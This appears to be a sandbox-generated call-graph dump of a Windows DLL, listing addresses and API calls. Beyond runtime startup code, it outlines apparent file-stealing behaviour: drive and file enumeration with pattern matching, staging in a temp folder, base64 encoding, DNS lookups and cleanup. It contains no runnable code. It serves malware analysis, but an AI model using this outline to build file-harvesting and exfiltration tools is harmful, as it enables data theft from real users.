8115->8119 8178 3a1ef7 8115->8178 8116->8115 8116->8119 8130 3a756f 8116->8130 8119->8113 8121 3a7798 8121->8119 8122 3a756f __CRT_INIT@12 137 API calls 8121->8122 8122->8119 8123 3a1ef7 ___DllMainCRTStartup 137 API calls 8124 3a778e 8123->8124 8125 3a756f __CRT_INIT@12 137 API calls 8124->8125 8125->8121 8127 3a889b 8126->8127 8128 3a88a8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8126->8128 8127->8128 8129 3a889f 8127->8129 8128->8129 8129->8110 8131 3a757b __initptd 8130->8131 8132 3a75fd 8131->8132 8133 3a7583 8131->8133 8135 3a7601 8132->8135 8136 3a7666 8132->8136 8182 3a820d GetProcessHeap 8133->8182 8140 3a7622 8135->8140 8167 3a758c __initptd __CRT_INIT@12 8135->8167 8283 3a7f95 8135->8283 8138 3a766b 8136->8138 8139 3a76c9 8136->8139 8137 3a7588 8137->8167 8183 3a7cdd 8137->8183 8141 3a89de __freeptd TlsGetValue 8138->8141 8139->8167 8314 3a7b6d 8139->8314 8286 3a7e6c RtlDecodePointer 8140->8286 8145 3a7676 8141->8145 8148 3a8d51 __calloc_crt 58 API calls 8145->8148 8145->8167 8147 3a7598 __RTC_Initialize 8155 3a75a8 GetCommandLineA 8147->8155 8147->8167 8152 3a7687 8148->8152 8150 3a7638 __CRT_INIT@12 8310 3a7651 8150->8310 8156 3a89fd __freeptd TlsSetValue 8152->8156 8152->8167 8153 3a84de __ioterm 59 API calls 8154 3a7633 8153->8154 8157 3a7d53 __mtterm 61 API calls 8154->8157 8204 3a8914 GetEnvironmentStringsW 8155->8204 8159 3a769f 8156->8159 8157->8150 8161 3a76bd 8159->8161 8162 3a76a5 8159->8162 8164 3a8840 _free 58 API calls 8161->8164 8166 3a7c2a __initptd 58 API calls 8162->8166 8164->8167 8165 3a75c2 8168 3a75c6 8165->8168 8236 3a8530 8165->8236 8169 3a76ad GetCurrentThreadId 8166->8169 8167->8115 8269 3a7d53 8168->8269 8169->8167 8173 3a75e6 8173->8167 8278 3a84de 8173->8278 8179 3a1efe 8178->8179 8180 3a1f07 8178->8180 8672 3a1ebe 8179->8672 8180->8121 8180->8123 8182->8137 8322 3a803c RtlEncodePointer 8183->8322 8185 3a7ce2 8328 3aa19f 8185->8328 8188 3a7ceb 8189 3a7d53 __mtterm 61 API calls 8188->8189 8191 3a7cf0 8189->8191 8191->8147 8193 3a7d08 8194 3a8d51 __calloc_crt 58 API calls 8193->8194 8195 3a7d15 8194->8195 8196 3a7d4a 8195->8196 8197 3a89fd __freeptd TlsSetValue 8195->8197 8198 3a7d53 __mtterm 61 API calls 8196->8198 8200 3a7d29 8197->8200 8199 3a7d4f 8198->8199 8199->8147 8200->8196 8201 3a7d2f 8200->8201 8202 3a7c2a __initptd 58 API calls 8201->8202 8203 3a7d37 GetCurrentThreadId 8202->8203 8203->8147 8205 3a8927 WideCharToMultiByte 8204->8205 8209 3a75b8 8204->8209 8207 3a895a 8205->8207 8208 3a8991 FreeEnvironmentStringsW 8205->8208 8210 3a8d99 __malloc_crt 58 API calls 8207->8210 8208->8209 8217 3a822a 8209->8217 8211 3a8960 8210->8211 8211->8208 8212 3a8967 WideCharToMultiByte 8211->8212 8213 3a897d 8212->8213 8214 3a8986 FreeEnvironmentStringsW 8212->8214 8215 3a8840 _free 58 API calls 8213->8215 8214->8209 8216 3a8983 8215->8216 8216->8214 8218 3a8236 __initptd 8217->8218 8219 3aa06e __lock 58 API calls 8218->8219 8220 3a823d 8219->8220 8221 3a8d51 __calloc_crt 58 API calls 8220->8221 8222 3a824e 8221->8222 8223 3a82b9 GetStartupInfoW 8222->8223 8224 3a8259 __initptd @_EH4_CallFilterFunc@8 8222->8224 8225 3a83fd 8223->8225 8232 3a82ce 8223->8232 8224->8165 8226 3a84c5 8225->8226 8229 3a844a GetStdHandle 8225->8229 8231 3a845d GetFileType 8225->8231 8235 3a8a1f __ioinit InitializeCriticalSectionAndSpinCount 8225->8235 8337 3a84d5 8226->8337 8228 3a8d51 __calloc_crt 58 API calls 8228->8232 8229->8225 8230 3a831c 8230->8225 8233 3a8350 GetFileType 8230->8233 8234 3a8a1f __ioinit InitializeCriticalSectionAndSpinCount 8230->8234 8231->8225 8232->8225 8232->8228 8232->8230 8233->8230 8234->8230 8235->8225 8237 3a853e 8236->8237 8238 3a8543 GetModuleFileNameA 8236->8238 8347 3a95de 8237->8347 8240 3a8570 8238->8240 8341 3a85e3 8240->8341 8243 3a8d99 __malloc_crt 58 API calls 8244 3a85a9 8243->8244 8245 3a85e3 _parse_cmdline 58 API calls 8244->8245 8246 3a75d2 8244->8246 8245->8246 8246->8173 8247 3a875f 8246->8247 8248 3a8768 8247->8248 8250 3a876d _strlen 8247->8250 8249 3a95de ___initmbctable 70 API calls 8248->8249 8249->8250 8251 3a8d51 __calloc_crt 58 API calls 8250->8251 8254 3a75db 8250->8254 8259 3a87a3 _strlen 8251->8259 8252 3a87f5 8253 3a8840 _free 58 API calls 8252->8253 8253->8254 8254->8173 8263 3a7fa4 8254->8263 8255 3a8d51 __calloc_crt 58 API calls 8255->8259 8256 3a881c 8258 3a8840 _free 58 API calls 8256->8258 8258->8254 8259->8252 8259->8254 8259->8255 8259->8256 8260 3a8833 8259->8260 8551 3aac98 8259->8551 8261 3a91d1 __invoke_watson 8 API calls 8260->8261 8262 3a883f 8261->8262 8264 3a7fb0 __IsNonwritableInCurrentImage 8263->8264 8560 3aa691 8264->8560 8266 3a7fce __initterm_e 8268 3a7fed __cinit __IsNonwritableInCurrentImage 8266->8268 8563 3aa67c 8266->8563 8268->8173 8270 3a7d63 8269->8270 8271 3a7d5d 8269->8271 8273 3aa0d4 8270->8273 8274 3aa0b8 RtlDeleteCriticalSection 8270->8274 8629 3a89bf 8271->8629 8276 3aa0e0 RtlDeleteCriticalSection 8273->8276 8277 3aa0f3 8273->8277 8275 3a8840 _free 58 API calls 8274->8275 8275->8270 8276->8273 8277->8167 8282 3a84e5 8278->8282 8279 3a852d 8279->8168 8280 3a8840 _free 58 API calls 8280->8282 8281 3a84fe RtlDeleteCriticalSection 8281->8282 8282->8279 8282->8280 8282->8281 8284 3a80de _doexit 58 API calls 8283->8284 8285 3a7fa0 8284->8285 8285->8140 8287 3a7e98 8286->8287 8288 3a7e86 8286->8288 8289 3a8840 _free 58 API calls 8287->8289 8288->8287 8290 3a8840 _free 58 API calls 8288->8290 8291 3a7ea5 8289->8291 8290->8288 8292 3a7ec9 8291->8292 8294 3a8840 _free 58 API calls 8291->8294 8293 3a8840 _free 58 API calls 8292->8293 8295 3a7ed5 8293->8295 8294->8291 8296 3a8840 _free 58 API calls 8295->8296 8297 3a7ee6 8296->8297 8298 3a8840 _free 58 API calls 8297->8298 8299 3a7ef1 8298->8299 8300 3a7f16 RtlEncodePointer 8299->8300 8305 3a8840 _free 58 API calls 8299->8305 8301 3a7f2b 8300->8301 8302 3a7f31 8300->8302 8303 3a8840 _free 58 API calls 8301->8303 8304 3a7f47 8302->8304 8306 3a8840 _free 58 API calls 8302->8306 8303->8302 8307 3a7627 8304->8307 8309 3a8840 _free 58 API calls 8304->8309 8308 3a7f15 8305->8308 8306->8304 8307->8150 8307->8153 8308->8300 8309->8307 8311 3a7663 8310->8311 8312 3a7655 8310->8312 8311->8167 8312->8311 8313 3a7d53 __mtterm 61 API calls 8312->8313 8313->8311 8315 3a7b7a 8314->8315 8321 3a7ba0 8314->8321 8316 3a7b88 8315->8316 8317 3a89de __freeptd TlsGetValue 8315->8317 8318 3a89fd __freeptd TlsSetValue 8316->8318 8317->8316 8319 3a7b98 8318->8319 8632 3a7a38 8319->8632 8321->8167 8335 3aa71b 8322->8335 8324 3a804d __init_pointers __initp_misc_winsig 8336 3aa6e4 RtlEncodePointer 8324->8336 8326 3a8065 __init_pointers 8327 3a8a8d 34 API calls 8326->8327 8327->8185 8329 3aa1ab 8328->8329 8330 3a8a1f __ioinit InitializeCriticalSectionAndSpinCount 8329->8330 8331 3a7ce7 8329->8331 8330->8329 8331->8188 8332 3a89a1 8331->8332 8333 3a89b8 TlsAlloc 8332->8333 8334 3a7cfd 8332->8334 8334->8188 8334->8193 8335->8324 8336->8326 8340 3aa1d8 RtlLeaveCriticalSection 8337->8340 8339 3a84dc 8339->8224 8340->8339 8343 3a8605 8341->8343 8346 3a8669 8343->8346 8351 3aac82 8343->8351 8344 3a8586 8344->8243 8344->8246 8345 3aac82 _parse_cmdline 58 API calls 8345->8346 8346->8344 8346->8345 8348 3a95ee 8347->8348 8349 3a95e7 8347->8349 8348->8238 8439 3a993b 8349->8439 8354 3aac28 8351->8354 8357 3a7837 8354->8357 8358 3a7848 8357->8358 8364 3a7895 8357->8364 8365 3a7ba3 8358->8365 8361 3a7875 8361->8364 8385 3a9895 8361->8385 8364->8343 8366 3a7bbb __getptd_noexit 58 API calls 8365->8366 8367 3a7ba9 8366->8367 8368 3a784e 8367->8368 8369 3a7f79 __amsg_exit 58 API calls 8367->8369 8368->8361 8370 3a9513 8368->8370 8369->8368 8371 3a951f __initptd 8370->8371 8372 3a7ba3 __write_nolock 58 API calls 8371->8372 8373 3a9528 8372->8373 8374 3a9557 8373->8374 8375 3a953b 8373->8375 8376 3aa06e __lock 58 API calls 8374->8376 8377 3a7ba3 __write_nolock 58 API calls 8375->8377 8378 3a955e 8376->8378 8383 3a9540 8377->8383 8397 3a9593 8378->8397 8382 3a954e __initptd 8382->8361 8383->8382 8384 3a7f79 __amsg_exit 58 API calls 8383->8384 8384->8382 8386 3a98a1 __initptd 8385->8386 8387 3a7ba3 __write_nolock 58 API calls 8386->8387 8388 3a98ab 8387->8388 8389 3a98bd 8388->8389 8390 3aa06e __lock 58 API calls 8388->8390 8391 3a98cb __initptd 8389->8391 8393 3a7f79 __amsg_exit 58 API calls 8389->8393 8395 3a98db 8390->8395 8391->8364 8392 3a9908 8435 3a9932 8392->8435 8393->8391 8395->8392 8396 3a8840 _free 58 API calls 8395->8396 8396->8392 8398 3a9572 8397->8398 8399 3a959e ___addlocaleref ___removelocaleref 8397->8399 8401 3a958a 8398->8401 8399->8398 8404 3a9319 8399->8404 8434 3aa1d8 RtlLeaveCriticalSection 8401->8434 8403 3a9591 8403->8383 8405 3a9392 8404->8405 8407 3a932e 8404->8407 8406 3a93df 8405->8406 8408 3a8840 _free 58 API calls 8405->8408 8409 3ab143 ___free_lc_time 58 API calls 8406->8409 8411 3a9408 8406->8411 8407->8405 8415 3a8840 _free 58 API calls 8407->8415 8417 3a935f 8407->8417 8410 3a93b3 8408->8410 8412 3a93fd 8409->8412 8413 3a8840 _free 58 API calls 8410->8413 8416 3a9467 8411->8416 8432 3a8840 58 API calls _free 8411->8432 8414 3a8840 _free 58 API calls 8412->8414 8418 3a93c6 8413->8418 8414->8411 8421 3a9354 8415->8421 8422 3a8840 _free 58 API calls 8416->8422 8423 3a8840 _free 58 API calls 8417->8423 8433 3a937d 8417->8433 8424 3a8840 _free 58 API calls 8418->8424 8419 3a8840 _free 58 API calls 8420 3a9387 8419->8420 8425 3a8840 _free 58 API calls 8420->8425 8426 3aafe0 ___free_lconv_mon 58 API calls 8421->8426 8427 3a946d 8422->8427 8428 3a9372 8423->8428 8429 3a93d4 8424->8429 8425->8405 8426->8417 8427->8398 8430 3ab0dc ___free_lconv_num 58 API calls 8428->8430 8431 3a8840 _free 58 API calls 8429->8431 8430->8433 8431->8406 8432->8411 8433->8419 8434->8403 8438 3aa1d8 RtlLeaveCriticalSection 8435->8438 8437 3a9939 8437->8389 8438->8437 8440 3a9947 __initptd 8439->8440 8441 3a7ba3 __write_nolock 58 API calls 8440->8441 8442 3a994f 8441->8442 8443 3a9895 __setmbcp 58 API calls 8442->8443 8444 3a9959 8443->8444 8464 3a9636 8444->8464 8447 3a8d99 __malloc_crt 58 API calls 8448 3a997b 8447->8448 8449 3a9aa8 __initptd 8448->8449 8471 3a9ae3 8448->8471 8449->8348 8452 3a9ab8 8452->8449 8454 3a8840 _free 58 API calls 8452->8454 8458 3a9acb 8452->8458 8453 3a99b1 8456 3a8840 _free 58 API calls 8453->8456 8457 3a99d1 8453->8457 8454->8458 8455 3a9230 __cftof_l 58 API calls 8455->8449 8456->8457 8457->8449 8459 3aa06e __lock 58 API calls 8457->8459 8458->8455 8461 3a9a00 8459->8461 8460 3a9a8e 8481 3a9aad 8460->8481 8461->8460 8463 3a8840 _free 58 API calls 8461->8463 8463->8460 8465 3a7837 _LocaleUpdate::_LocaleUpdate 58 API calls 8464->8465 8466 3a9646 8465->8466 8467 3a9667 8466->8467 8468 3a9655 GetOEMCP 8466->8468 8469 3a967e 8467->8469 8470 3a966c GetACP 8467->8470 8468->8469 8469->8447 8469->8449 8470->8469 8472 3a9636 getSystemCP 60 API calls 8471->8472 8474 3a9b00 8472->8474 8473 3a9b07 setSBCS 8475 3aaf32 __cftof_l 6 API calls 8473->8475 8474->8473 8477 3a9b51 IsValidCodePage 8474->8477 8480 3a9b76 _memset __setmbcp_nolock 8474->8480 8476 3a99a2 8475->8476 8476->8452 8476->8453 8477->8473 8478 3a9b63 GetCPInfo 8477->8478 8478->8473 8478->8480 8484 3a9703 GetCPInfo 8480->8484 8550 3aa1d8 RtlLeaveCriticalSection 8481->8550 8483 3a9ab4 8483->8449 8485 3a97e5 8484->8485 8490 3a973b 8484->8490 8487 3aaf32 __cftof_l 6 API calls 8485->8487 8489 3a9891 8487->8489 8489->8473 8494 3ab823 8490->8494 8493 3ab6c7 ___crtLCMapStringA 62 API calls 8493->8485 8495 3a7837 _LocaleUpdate::_LocaleUpdate 58 API calls 8494->8495 8496 3ab834 8495->8496 8504 3ab72b 8496->8504 8499 3ab6c7 8500 3a7837 _LocaleUpdate::_LocaleUpdate 58 API calls 8499->8500 8501 3ab6d8 8500->8501 8521 3ab4c3 8501->8521 8505 3ab752 MultiByteToWideChar 8504->8505 8506 3ab745 8504->8506 8507 3ab777 8505->8507 8510 3ab77e 8505->8510 8506->8505 8508 3aaf32 __cftof_l 6 API calls 8507->8508 8509 3a979c 8508->8509 8509->8499 8512 3aad7b _malloc 58 API calls 8510->8512 8515 3ab7a0 _memset 8510->8515 8511 3ab7dc MultiByteToWideChar 8513 3ab806 8511->8513 8514 3ab7f6 GetStringTypeW 8511->8514 8512->8515 8517 3ab70d 8513->8517 8514->8513 8515->8507 8515->8511 8518 3ab728 8517->8518 8519 3ab717 8517->8519 8518->8507 8519->8518 8520 3a8840 _free 58 API calls 8519->8520 8520->8518 8523 3ab4dc MultiByteToWideChar 8521->8523 8524 3ab53b 8523->8524 8526 3ab542 8523->8526 8525 3aaf32 __cftof_l 6 API calls 8524->8525 8527 3a97bd 8525->8527 8533 3aad7b _malloc 58 API calls 8526->8533 8535 3ab56a 8526->8535 8527->8493 8528 3ab5a1 MultiByteToWideChar 8529 3ab608 8528->8529 8530 3ab5ba 8528->8530 8532 3ab70d __freea 58 API calls 8529->8532 8546 3ad4db 8530->8546 8532->8524 8533->8535 8534 3ab5ce 8534->8529 8536 3ab5e4 8534->8536 8538 3ab610 8534->8538 8535->8524 8535->8528 8536->8529 8537 3ad4db __crtLCMapStringA_stat LCMapStringW 8536->8537 8537->8529 8540 3aad7b _malloc 58 API calls 8538->8540 8544 3ab638 8538->8544 8539 3ad4db __crtLCMapStringA_stat LCMapStringW 8541 3ab67b 8539->8541 8540->8544 8542 3ab6a3 8541->8542 8545 3ab695 WideCharToMultiByte 8541->8545 8543 3ab70d __freea 58 API calls 8542->8543 8543->8529 8544->8529 8544->8539 8545->8542 8547 3ad4eb 8546->8547 8548 3ad506 __crtLCMapStringA_stat 8546->8548 8547->8534 8549 3ad51d LCMapStringW 8548->8549 8549->8534 8550->8483 8552 3aacb1 8551->8552 8553 3aaca3 8551->8553 8554 3a9230 __cftof_l 58 API calls 8552->8554 8553->8552 8558 3aacc7 8553->8558 8555 3aacb8 8554->8555 8556 3a91c1 __cftof_l 9 API calls 8555->8556 8557 3aacc2 8556->8557 8557->8259 8558->8557 8559 3a9230 __cftof_l 58 API calls 8558->8559 8559->8555 8561 3aa694 RtlEncodePointer 8560->8561 8561->8561 8562 3aa6ae 8561->8562 8562->8266 8566 3aa580 8563->8566 8565 3aa687 8565->8268 8567 3aa58c __initptd 8566->8567 8574 3a80cc 8567->8574 8573 3aa5b3 __initptd 8573->8565 8575 3aa06e __lock 58 API calls 8574->8575 8576 3a80d3 8575->8576 8577 3aa5c4 RtlDecodePointer RtlDecodePointer 8576->8577 8578 3aa5a1 8577->8578 8579 3aa5f1 8577->8579 8588 3aa5be 8578->8588 8579->8578 8591 3ae280 8579->8591 8581 3aa603 8582 3aa654 RtlEncodePointer RtlEncodePointer 8581->8582 8583 3aa628 8581->8583 8598 3a8de0 8581->8598 8582->8578 8583->8578 8585 3a8de0 __realloc_crt 61 API calls 8583->8585 8586 3aa642 RtlEncodePointer 8583->8586 8587 3aa63c 8585->8587 8586->8582 8587->8578 8587->8586 8625 3a80d5 8588->8625 8592 3ae289 8591->8592 8593 3ae29e RtlSizeHeap 8591->8593 8594 3a9230 __cftof_l 58 API calls 8592->8594 8593->8581 8595 3ae28e 8594->8595 8596 3a91c1 __cftof_l 9 API calls 8595->8596 8597 3ae299 8596->8597 8597->8581 8602 3a8de7 8598->8602 8600 3a8e24 8600->8583 8602->8600 8603 3aae0d 8602->8603 8624 3a8d18 Sleep 8602->8624 8604 3aae21 8603->8604 8605 3aae16 8603->8605 8607 3aae29 8604->8607 8615 3aae36 8604->8615 8606 3aad7b _malloc 58 API calls 8605->8606 8608 3aae1e 8606->8608 8609 3a8840 _free 58 API calls 8607->8609 8608->8602 8623 3aae31 __dosmaperr 8609->8623 8610 3aae6e 8611 3aa6f5 _malloc RtlDecodePointer 8610->8611 8613 3aae74 8611->8613 8612 3aae3e RtlReAllocateHeap 8612->8615 8612->8623 8616 3a9230 __cftof_l 58 API calls 8613->8616 8614 3aae9e 8618 3a9230 __cftof_l 58 API calls 8614->8618 8615->8610 8615->8612 8615->8614 8617 3aa6f5 _malloc RtlDecodePointer 8615->8617 8620 3aae86 8615->8620 8616->8623 8617->8615 8619 3aaea3 GetLastError 8618->8619 8619->8623 8621 3a9230 __cftof_l 58 API calls 8620->8621 8622 3aae8b GetLastError 8621->8622 8622->8623 8623->8602 8624->8602 8628 3aa1d8 RtlLeaveCriticalSection 8625->8628 8627 3a80dc 8627->8573 8628->8627 8630 3a89d2 8629->8630 8631 3a89d6 TlsFree 8629->8631 8630->8270 8631->8270 8634 3a7a44 __initptd 8632->8634 8633 3a7a5d 8637 3a7a6c 8633->8637 8638 3a8840 _free 58 API calls 8633->8638 8634->8633 8635 3a7b4c __initptd 8634->8635 8636 3a8840 _free 58 API calls 8634->8636 8635->8321 8636->8633 8639 3a8840 _free 58 API calls 8637->8639 8641 3a7a7b 8637->8641 8638->8637 8639->8641 8640 3a8840 _free 58 API calls 8642 3a7a8a 8640->8642 8641->8640 8641->8642 8643 3a8840 _free 58 API calls 8642->8643 8645 3a7a99 8642->8645 8643->8645 8644 3a7aa8 8647 3a7ab7 8644->8647 8649 3a8840 _free 58 API calls 8644->8649 8645->8644 8646 3a8840 _free 58 API calls 8645->8646 8646->8644 8648 3a7ac9 8647->8648 8650 3a8840 _free 58 API calls 8647->8650 8651 3aa06e __lock 58 API calls 8648->8651 8649->8647 8650->8648 8654 3a7ad1 8651->8654 8652 3a7af4 8664 3a7b58 8652->8664 8654->8652 8656 3a8840 _free 58 API calls 8654->8656 8656->8652 8657 3aa06e __lock 58 API calls 8662 3a7b08 ___removelocaleref 8657->8662 8658 3a7b39 8667 3a7b64 8658->8667 8661 3a8840 _free 58 API calls 8661->8635 8662->8658 8663 3a9319 ___freetlocinfo 58 API calls 8662->8663 8663->8658 8670 3aa1d8 RtlLeaveCriticalSection 8664->8670 8666 3a7b01 8666->8657 8671 3aa1d8 RtlLeaveCriticalSection 8667->8671 8669 3a7b46 8669->8661 8670->8666 8671->8669 8682 3a1210 VirtualQuery 8672->8682 8675 3a1eca 8675->8180 8677 3a1ed6 RtlMoveMemory NtUnmapViewOfSection 8685 3a1d43 8677->8685 8679 3a1ef6 8680 3a1f07 8679->8680 8681 3a1ebe ___DllMainCRTStartup 135 API calls 8679->8681 8680->8180 8681->8680 8683 3a1227 8682->8683 8683->8675 8684 3a1000 GetProcessHeap RtlAllocateHeap 8683->8684 8684->8677 8707 3a1000 GetProcessHeap RtlAllocateHeap 8685->8707 8687 3a1d54 8708 3a1000 GetProcessHeap RtlAllocateHeap 8687->8708 8689 3a1d61 wsprintfA 8699 3a1d85 8689->8699 8691 3a1e99 RtlZeroMemory Sleep 8691->8699 8692 3a1185 lstrlen lstrlen ___DllMainCRTStartup 8692->8699 8695 3a1de0 RtlMoveMemory lstrlen 8714 3a1000 GetProcessHeap RtlAllocateHeap 8695->8714 8698 3a1e7b 8721 3a1b5b 8698->8721 8699->8691 8699->8692 8699->8698 8706 3a1011 GetProcessHeap HeapFree VirtualQuery ___DllMainCRTStartup 8699->8706 8709 3a11d1 OpenFileMappingA 8699->8709 8712 3a11fd UnmapViewOfFile FindCloseChangeNotification 8699->8712 8713 3a1000 GetProcessHeap RtlAllocateHeap 8699->8713 8715 3a1185 lstrlen lstrlen 8699->8715 8702 3a1e58 RtlMoveMemory 8705 3a12b6 ___DllMainCRTStartup 2 API calls 8702->8705 8703 3a1e33 RtlMoveMemory 8717 3a12b6 8703->8717 8705->8699 8706->8699 8707->8687 8708->8689 8710 3a11f8 8709->8710 8711 3a11e5 MapViewOfFile 8709->8711 8710->8699 8711->8710 8712->8691 8713->8695 8714->8699 8716 3a11a6 RtlZeroMemory 8715->8716 8716->8702 8716->8703 8718 3a12f5 8717->8718 8720 3a12cb lstrlen RtlMoveMemory 8717->8720 8718->8699 8720->8718 8761 3a1090 8721->8761 8725 3a1b83 GetTempPathW lstrcatW 8769 3a185d 8725->8769 8729 3a1bc2 GetLogicalDriveStringsW 8730 3a1d28 8729->8730 8734 3a1bd8 8729->8734 8732 3a1011 ___DllMainCRTStartup 3 API calls 8730->8732 8731 3a1bdf GetDriveTypeW 8731->8734 8733 3a1d2f 8732->8733 8734->8731 8736 3a1c22 lstrlenW 8734->8736 8773 3a1000 GetProcessHeap RtlAllocateHeap 8734->8773 8736->8731 8738 3a1c34 WaitForMultipleObjects 8736->8738 8737 3a1bfd lstrcatW CreateThread 8737->8736 8910 3a1b37 8737->8910 8739 3a1c4e CloseHandle 8738->8739 8740 3a1c5d wsprintfW 8738->8740 8739->8739 8739->8740 8774 3a224f 8740->8774 8743 3a1d1b 8747 3a185d ___DllMainCRTStartup 3 API calls 8743->8747 8744 3a1c99 GetFileSize 8745 3a1cac 8744->8745 8746 3a1d14 CloseHandle 8744->8746 8745->8746 8783 3a1000 GetProcessHeap RtlAllocateHeap 8745->8783 8746->8743 8748 3a1d20 DeleteFileW 8747->8748 8748->8730 8750 3a1cb9 ReadFile 8751 3a1d0d 8750->8751 8752 3a1cd4 8750->8752 8753 3a1011 ___DllMainCRTStartup 3 API calls 8751->8753 8752->8751 8784 3a126d 8752->8784 8753->8746 8759 3a1d06 8802 3a1011 8759->8802 8762 3a109a lstrlen 8761->8762 8767 3a10cd 8761->8767 8807 3a1000 GetProcessHeap RtlAllocateHeap 8762->8807 8764 3a10b0 MultiByteToWideChar 8765 3a10c6 8764->8765 8764->8767 8766 3a1011 ___DllMainCRTStartup 3 API calls 8765->8766 8766->8767 8768 3a1000 GetProcessHeap RtlAllocateHeap 8767->8768 8768->8725 8770 3a186e RtlZeroMemory lstrlenW SHFileOperationW 8769->8770 8771 3a18a4 CreateDirectoryW 8769->8771 8770->8771 8772 3a1000 GetProcessHeap RtlAllocateHeap 8771->8772 8772->8729 8773->8737 8775 3a227a ___DllMainCRTStartup 8774->8775 8808 3a26b4 8775->8808 8778 3a1c79 CreateFileW 8778->8743 8778->8744 8779 3a228b lstrlenW 8812 3a217c 8779->8812 8783->8750 8785 3a127e CryptBinaryToStringA 8784->8785 8786 3a12ad 8784->8786 8785->8786 8787 3a1291 8785->8787 8786->8751 8790 3a17c9 8786->8790 8851 3a1000 GetProcessHeap RtlAllocateHeap 8787->8851 8789 3a129c CryptBinaryToStringA 8789->8786 8791 3a17df lstrlen 8790->8791 8792 3a17ec 8790->8792 8791->8792 8852 3a1000 GetProcessHeap RtlAllocateHeap 8792->8852 8794 3a17f4 lstrcat 8795 3a1829 lstrcat 8794->8795 8796 3a1830 8794->8796 8795->8796 8853 3a145b 8796->8853 8799 3a1011 ___DllMainCRTStartup 3 API calls 8800 3a1853 8799->8800 8801 3a105d VirtualFree 8800->8801 8801->8759 8803 3a1210 ___DllMainCRTStartup VirtualQuery 8802->8803 8804 3a1019 8803->8804 8805 3a102d 8804->8805 8806 3a101d GetProcessHeap HeapFree 8804->8806 8805->8751 8806->8805 8807->8764 8809 3a26c5 8808->8809 8825 3a25d3 8809->8825 8811 3a2285 8811->8778 8811->8779 8829 3a1fa2 8812->8829 8814 3a219e 8815 3a2246 8814->8815 8816 3a21a6 FindFirstFileW 8814->8816 8822 3a31ee 8815->8822 8816->8815 8820 3a21c5 ___DllMainCRTStartup 8816->8820 8817 3a222d FindNextFileW 8818 3a223f FindClose 8817->8818 8817->8820 8818->8815 8819 3a1fa2 ___DllMainCRTStartup PathCombineW 8819->8820 8820->8817 8820->8818 8820->8819 8821 3a217c ___DllMainCRTStartup PathCombineW 8820->8821 8821->8820 8832 3a31f6 8822->8832 8826 3a25e0 __ftelli64_nolock ___DllMainCRTStartup 8825->8826 8827 3aad7b _malloc 58 API calls 8826->8827 8828 3a2629 ___DllMainCRTStartup 8826->8828 8827->8828 8828->8811 8830 3a1fc1 PathCombineW 8829->8830 8831 3a1faf 8829->8831 8830->8814 8831->8830 8835 3a31ff 8832->8835 8836 3a321d 8835->8836 8837 3a31f4 8835->8837 8840 3a3228 ___DllMainCRTStartup 8836->8840 8845 3a31e5 8836->8845 8837->8778 8848 3a22ee 8840->8848 8841 3a32ca ___DllMainCRTStartup _strlen 8842 3a3650 8841->8842 8844 3a8840 _free 58 API calls 8841->8844 8843 3a8840 _free 58 API calls 8842->8843 8843->8837 8844->8842 8846 3a31db ___DllMainCRTStartup 58 API calls 8845->8846 8847 3a31ec 8846->8847 8847->8840 8849 3a22d0 ___DllMainCRTStartup 58 API calls 8848->8849 8850 3a22f8 8849->8850 8850->8841 8851->8789 8852->8794 8887 3a142d 8853->8887 8857 3a1488 8892 3a106c lstrlen MultiByteToWideChar 8857->8892 8859 3a1497 8893 3a130e RtlZeroMemory 8859->8893 8862 3a14e9 RtlZeroMemory 8865 3a151e 8862->8865 8863 3a1011 ___DllMainCRTStartup 3 API calls 8864 3a17be 8863->8864 8864->8799 8867 3a17ab 8865->8867 8870 3a154c ___DllMainCRTStartup 8865->8870 8895 3a139e 8865->8895 8867->8863 8868 3a1791 8868->8867 8869 3a1011 ___DllMainCRTStartup 3 API calls 8868->8869 8869->8867 8870->8868 8904 3a1000 GetProcessHeap RtlAllocateHeap 8870->8904 8872 3a161c wsprintfW 8873 3a1642 8872->8873 8877 3a16af 8873->8877 8905 3a1000 GetProcessHeap RtlAllocateHeap 8873->8905 8875 3a167c wsprintfW 8875->8877 8876 3a176e 8878 3a1011 ___DllMainCRTStartup 3 API calls 8876->8878 8877->8876 8906 3a1000 GetProcessHeap RtlAllocateHeap 8877->8906 8879 3a1782 8878->8879 8879->8868 8881 3a1011 ___DllMainCRTStartup 3 API calls 8879->8881 8881->8868 8882 3a16fa 8883 3a1767 8882->8883 8907 3a104c VirtualAlloc 8882->8907 8885 3a1011 ___DllMainCRTStartup 3 API calls 8883->8885 8885->8876 8886 3a1754 RtlMoveMemory 8886->8883 8888 3a1443 8887->8888 8889 3a1437 8887->8889 8891 3a1000 GetProcessHeap RtlAllocateHeap 8888->8891 8890 3a1185 ___DllMainCRTStartup 2 API calls 8889->8890 8890->8888 8891->8857 8892->8859 8894 3a1330 8893->8894 8894->8862 8894->8867 8896 3a140c 8895->8896 8898 3a13ab 8895->8898 8896->8870 8897 3a13af DnsQuery_W 8897->8898 8898->8896 8898->8897 8899 3a13ee DnsFree inet_ntoa 8898->8899 8899->8898 8900 3a140e 8899->8900 8908 3a1000 GetProcessHeap RtlAllocateHeap 8900->8908 8902 3a1418 8909 3a106c lstrlen MultiByteToWideChar 8902->8909 8904->8872 8905->8875 8906->8882 8907->8886 8908->8902 8909->8896 8911 3a1b52 RtlExitUserThread 8910->8911 8912 3a1b44 8910->8912 8916 3a1939 8912->8916 8915 3a1011 ___DllMainCRTStartup 3 API calls 8915->8911 8917 3a1b2f 8916->8917 8918 3a1957 8916->8918 8917->8915 8937 3a1000 GetProcessHeap RtlAllocateHeap 8918->8937 8920 3a1961 wsprintfW FindFirstFileW 8921 3a1b28 8920->8921 8936 3a19bb 8920->8936 8922 3a1011 ___DllMainCRTStartup 3 API calls 8921->8922 8922->8917 8923 3a19d5 lstrcmpiW 8927 3a19e8 wsprintfW 8923->8927 8923->8936 8924 3a1a27 wsprintfW wsprintfW 8925 3a1b05 FindNextFileW 8924->8925 8924->8936 8926 3a1b1d FindClose 8925->8926 8925->8936 8926->8921 8928 3a1939 9 API calls 8927->8928 8928->8936 8929 3a1a73 RtlZeroMemory 8929->8936 8930 3a1a86 lstrcat 8930->8936 8931 3a1185 ___DllMainCRTStartup 2 API calls 8931->8936 8932 3a1aa7 StrToIntA 8932->8936 8933 3a1090 ___DllMainCRTStartup 7 API calls 8934 3a1ac9 PathMatchSpecW 8933->8934 8934->8936 8935 3a1011 ___DllMainCRTStartup 3 API calls 8935->8936 8936->8923 8936->8924 8936->8925 8936->8929 8936->8930 8936->8931 8936->8932 8936->8933 